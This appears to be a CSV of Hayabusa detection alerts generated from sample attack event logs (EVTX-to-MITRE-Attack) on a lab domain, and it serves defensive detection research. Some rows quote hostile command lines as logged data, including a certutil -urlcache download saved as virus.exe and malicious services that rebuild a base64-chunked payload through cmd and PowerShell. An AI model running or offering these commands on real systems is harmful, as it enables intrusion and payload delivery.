PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 13:41:21.325 +00:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-31 14:28:15.330 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.331 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-LocalGroupMember -Name Administrators,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.331 +00:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.342 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-LocalGroupMember): ""Get-LocalGroupMember"" ParameterBinding(Get-LocalGroupMember): name=""Name""; value=""Administrators""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.342 +00:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups 
Information,,rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.351 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""JUMP01\Administrator"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Domain Admins"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Nessus Local Access"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\SG_LocalAdmin_Lab""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.353 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.354 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:37:10.246 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): 
""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.247 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-ADGroupMember -Identity 'Administrators',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.396 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-ADGroupMember): ""Get-ADGroupMember"" ParameterBinding(Get-ADGroupMember): name=""Identity""; value=""Administrators""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.398 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Nessus Local Access,OU=Security-groups,OU=OFFSEC-COMPANY,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Domain Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Enterprise Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Administrator,CN=Users,DC=offsec,DC=lan""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.401 
+00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.402 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-11-02 14:15:23.676 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-02 14:15:24.567 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-02 14:15:24.567 +00:00,fs03vuln.offsec.lan,4688,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_builtin/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files 
or Information/ID4688-Certutil download.evtx +2021-11-03 08:15:14.789 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:14.789 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:14.789 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 08:15:16.295 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:16.295 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:16.295 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed 
via service - Tchopper.evtx" +2021-11-03 08:15:17.775 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:17.775 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:17.775 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via 
service - Tchopper.evtx" +2021-11-03 08:15:19.262 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:19.262 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:19.262 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:20.742 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:20.742 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:20.742 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:22.220 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:22.220 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:22.220 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:23.679 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:23.679 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:23.679 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:25.150 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:25.150 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:25.150 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:15:26.606 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:26.606 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:26.606 